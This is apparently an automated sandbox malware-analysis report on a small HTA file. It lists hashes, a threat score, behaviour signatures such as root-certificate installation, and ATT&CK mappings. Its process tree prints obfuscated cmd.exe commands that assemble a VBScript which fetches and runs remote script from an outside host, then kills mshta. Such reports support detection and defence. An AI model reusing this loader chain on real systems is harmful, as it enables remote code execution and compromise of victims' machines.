7e360e8b091aab014189554faeef805a3ae2ffd11124fd4ffdd827abf3be7306

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
29/08/2024, 09:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.hta
Size

147B
MD5

0144b746edf817419d3fe42b0c50fe92
SHA1

f469ffccdf5213f4be17608d2b44d738a604b807
SHA256

7e360e8b091aab014189554faeef805a3ae2ffd11124fd4ffdd827abf3be7306
SHA512

da5447e4ea8313b7cfdc5bb7c3dffe8c21cf2ae5b07c653f0abd125415647f71330c84502f5a0eafdbd7b1a465d0de103ed9598e9183d6587f08299d0df683a2

Score

8^/10

discovery

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
5	2144	mshta.exe
7	2144	mshta.exe
9	2144	mshta.exe
11	2300	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1448	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	mshta.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1448	taskkill.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 2144 wrote to memory of 3028	2144	mshta.exe	32
PID 2144 wrote to memory of 3028	2144	mshta.exe	32
PID 2144 wrote to memory of 3028	2144	mshta.exe	32
PID 2144 wrote to memory of 3028	2144	mshta.exe	32
PID 2144 wrote to memory of 2016	2144	mshta.exe	34
PID 2144 wrote to memory of 2016	2144	mshta.exe	34
PID 2144 wrote to memory of 2016	2144	mshta.exe	34
PID 2144 wrote to memory of 2016	2144	mshta.exe	34
PID 2016 wrote to memory of 2768	2016	cmd.exe	36
PID 2016 wrote to memory of 2768	2016	cmd.exe	36
PID 2016 wrote to memory of 2768	2016	cmd.exe	36
PID 2016 wrote to memory of 2768	2016	cmd.exe	36
PID 2016 wrote to memory of 2892	2016	cmd.exe	37
PID 2016 wrote to memory of 2892	2016	cmd.exe	37
PID 2016 wrote to memory of 2892	2016	cmd.exe	37
PID 2016 wrote to memory of 2892	2016	cmd.exe	37
PID 2016 wrote to memory of 2820	2016	cmd.exe	38
PID 2016 wrote to memory of 2820	2016	cmd.exe	38
PID 2016 wrote to memory of 2820	2016	cmd.exe	38
PID 2016 wrote to memory of 2820	2016	cmd.exe	38
PID 2016 wrote to memory of 328	2016	cmd.exe	39
PID 2016 wrote to memory of 328	2016	cmd.exe	39
PID 2016 wrote to memory of 328	2016	cmd.exe	39
PID 2016 wrote to memory of 328	2016	cmd.exe	39
PID 2144 wrote to memory of 2772	2144	mshta.exe	40
PID 2144 wrote to memory of 2772	2144	mshta.exe	40
PID 2144 wrote to memory of 2772	2144	mshta.exe	40
PID 2144 wrote to memory of 2772	2144	mshta.exe	40
PID 2144 wrote to memory of 2616	2144	mshta.exe	42
PID 2144 wrote to memory of 2616	2144	mshta.exe	42
PID 2144 wrote to memory of 2616	2144	mshta.exe	42
PID 2144 wrote to memory of 2616	2144	mshta.exe	42
PID 2616 wrote to memory of 2300	2616	cmd.exe	44
PID 2616 wrote to memory of 2300	2616	cmd.exe	44
PID 2616 wrote to memory of 2300	2616	cmd.exe	44
PID 2616 wrote to memory of 2300	2616	cmd.exe	44
PID 2300 wrote to memory of 1448	2300	WScript.exe	45
PID 2300 wrote to memory of 1448	2300	WScript.exe	45
PID 2300 wrote to memory of 1448	2300	WScript.exe	45
PID 2300 wrote to memory of 1448	2300	WScript.exe	45

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\test.hta"
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2144
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /V/D/c "echo WLzi1c22="ri">C:\Users\Public\vvcH43.vbs&&echo IZ4u450="tp">>C:\Users\Public\vvcH43.vbs&&echo hMJQ6C71=".":OduoBTg12="sC" ^& WLzi1c22 ^& "pt:ht" ^& IZ4u450 ^& "s://">>C:\Users\Public\vvcH43.vbs"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3028
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /V/D/c echo|set /p=^"OduoBTg12^=OduoBTg12 ^& ^"43"+hMJQ6C71+"244"+hMJQ6C71+"109"+hMJQ6C71+"208"+hMJQ6C71+"host"+hMJQ6C71+"secureserver"+hMJQ6C71+"net/g1^":GetO^">>C:\Users\Public\\vvcH43.vbs&echo|set /p=^"bject(^">>C:\Users\Public\\vvcH43.vbs
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" set /p="OduoBTg12=OduoBTg12 & "43"+hMJQ6C71+"244"+hMJQ6C71+"109"+hMJQ6C71+"208"+hMJQ6C71+"host"+hMJQ6C71+"secureserver"+hMJQ6C71+"net/g1":GetO" 1>>C:\Users\Public\\vvcH43.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" set /p="bject(" 1>>C:\Users\Public\\vvcH43.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:328
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /V/D/c "echo _>>C:\Users\Public\\vvcH43.vbs&&echo OduoBTg12)>>C:\Users\Public\\vvcH43.vbs"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2772
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\\vvcH43.vbs
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2616
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Public\vvcH43.vbs"
    3⤵
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2300
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /F /IM mshta.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1448

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\04788E6207035207B8930FC2CDD3C940

Filesize
504B

MD5
98df72bb54091099af3a2120b9f6786a

SHA1
7c629a82e6043390a067890565cafbfb6d6feb04

SHA256
565456ad44f24835fc8b4291cd293c15b5816bf3953221bf43439bb8d8c243ba

SHA512
e674e62a32f1ef57de54e9248a62a520827d005278e7f376d460ad76c17a989523fb351022def512f801e8bbc3c8d33882277d5091f5b27abbccda208e61ccb3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\04788E6207035207B8930FC2CDD3C940

Filesize
554B

MD5
657c8ac147a92f54cd4f0f1997accab0

SHA1
9b46849fadf27c222840e98aa8e8e9883d6d6c6f

SHA256
65b8b1a1dd569e7763c15cd8f3f6478eb61dcb0c0ad3cc1ec4ff4bf4b38f5afe

SHA512
4f2ffe225a14a4d67cf5216795dcd4af878d5c247e467b53729b3a273300177d224c68be0283d3b580d39b38dcbb64bf35cae24e6661b10e5c8c25559e10f3d2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
7201e109a2fc6dda1db0df301876a8db

SHA1
e1655d367b6e682195404a75214428cefe565c6e

SHA256
7c09aaa5ce46c82912bbb63b5a58f7902b935a260cf512c23a7eecd54ddf7255

SHA512
3e6d6e6f336db068ea2897c0cc4f14c4a0857eb90d38b9b18c286d3ed27ac505f6f31433ada59d2456c658711040db2c1729a191d0c091303bb3f84bc6a5e3c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabE070.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Public\vvcH43.vbs

Filesize
98B

MD5
0cd354827105e75b556094e7de26cbb7

SHA1
4e51cd87dcc34fbc2eef24627bfb3ab79c9e2b72

SHA256
c999dc13194bdb0f517cbee4431c655761a2a96de29755e6f9f63de7931d5707

SHA512
958410f2173fd08adb726397194212f145aa2e8e3d13ae50c9d2968f29177202979aac106bb2651505a91e638947c56fc85fa11adda8e22a8c440ccf063e55fe

Download Submit
C:\Users\Public\vvcH43.vbs

Filesize
238B

MD5
e2a22af70bf4b9205ed04bc63fe04bc7

SHA1
e6cb55d932cf06de83495859e6e479d0dfc2b62a

SHA256
acdbdd62510404a1e90793bdb71adad7ac95e98b96b4a6122bcb9f8daaa1c8b9

SHA512
94e44876f80f293f5290c3a0333764e7f7c2e1334aafbc42e6b41db07d6d7b67aba1fface70840f1655c52774fef4b0d55948d7667f712cce4567d056a4fd7f9

Download Submit
C:\Users\Public\vvcH43.vbs

Filesize
241B

MD5
30b71cb46c0a264fbc232d429bc67ead

SHA1
64ea1a1778efa0a8dc5bef94af04b9b40b0856ea

SHA256
2b9ef78793c3383fa2c28fa2b4c2ddf2bbb8237b916c72007de97df31045db49

SHA512
07f40ae25a0ea15fede16e368419187d78ad98edf5d0637e9a0b9ce29181df072c0d3648b8e99dcb81a5809180df1a22c25c7ec04e82c7c6da89c0f675e9a1d9

Download Submit
C:\Users\Public\vvcH43.vbs

Filesize
253B

MD5
5df54ea4c54de9e8ad092eeac6026f9f

SHA1
eb6456597a1517df01a163393c660de6ff7206da

SHA256
9ce80b592750d0f78f35ac4215c1925ca6ee3161a9e4aa257a1cf0228952e3d5

SHA512
fe7f49ff04578bb209a39d84ef4530d7fe31cbdd70405d6c43eb9a571187e28ae7547843add6131ea9b24f469d02b3a884dff6d7a43e0b0a0cd819fc40c74fc3

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads